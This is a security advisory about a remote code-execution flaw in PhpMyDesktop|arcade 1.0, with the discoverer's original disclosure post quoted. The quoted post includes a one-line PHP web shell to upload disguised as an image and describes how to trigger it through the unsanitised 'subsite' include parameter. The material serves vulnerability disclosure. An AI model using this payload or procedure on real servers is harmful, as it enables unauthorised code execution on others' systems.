PhpMyDesktop|arcade Include File Bug in 'subsite' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1016180|
SecurityTracker URL: http://securitytracker.com/id/1016180
(Links to External Site)
Updated: Aug 17 2009|
Original Entry Date: May 30 2006
Execution of arbitrary code via network, User access via network|
Exploit Included: Yes |
Version(s): 1.0 FINAL|
A vulnerability was reported in PhpMyDesktop|arcade. A remote user can include and execute arbitrary code on the target system.|
The software does not properly validate user-supplied input in the 'subsite' parameter. A remote user can upload an image file containing PHP code. Then, the remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the uploaded file. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
darkgod discovered this vulnerability.
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.|
No solution was available at the time of this entry.|
Vendor URL: pmd-arcade.sourceforge.net/ (Links to External Site)
Input validation error, State error|
|Underlying OS: Linux (Any), UNIX (Any), Windows (Any)|
Source Message Contents
Subject: phpMyDesktop|arcade 1.0 FINAL Code Execution|
phpMyDesktop|arcade 1.0 FINAL
Code Execution Exploit
found-by: darkgod (email@example.com)
links: criticalsecurity.NET, hackthissite.org, hacbloc.org
phpMyDesktop|arcade is a php-based 'bridge' between a game and message board.
Its got a very nice interface, and many customiseable options.
Unfortunately, it suffers from two [three.] vulnerabilities.
1. Images are not checked for validity.
This may not be a vuln in itself -- because code won't execute inside images. But you could
mess with Internet Explorer, which in some versions allow HTML inside of images.
2. GET variable 'subsite' not sanitized.
Now, how does this allow code execution, you ask?
We upload our image with content of: <?php eval(stripslashes($_GET['code'])); ?>
To upload, you must post in one of the blocks. It will NOT POST YOUR CONTENT. This is because
it is trying first to create a thumbnail of your image, which is invalid, so it will bork.
But the image still gets uploaded.
So, now we use the second vulnerability.
Firstly, we must get to the 'top' of the drive, and find our way back. Create an error with it first,
so you can see the full path (let's say its /var/www/html/phpmydesktop1/.)
So, in order to get our code, you must do:
And assuming you uploaded what I said, the file query (in your addressbar)
will look like:
And add a &code=print('h0n0r');
To execute any code you wish.
Over at pmd-arcade.sourceforge.net, their contact & support page is down, so I see no easy way of contacting them.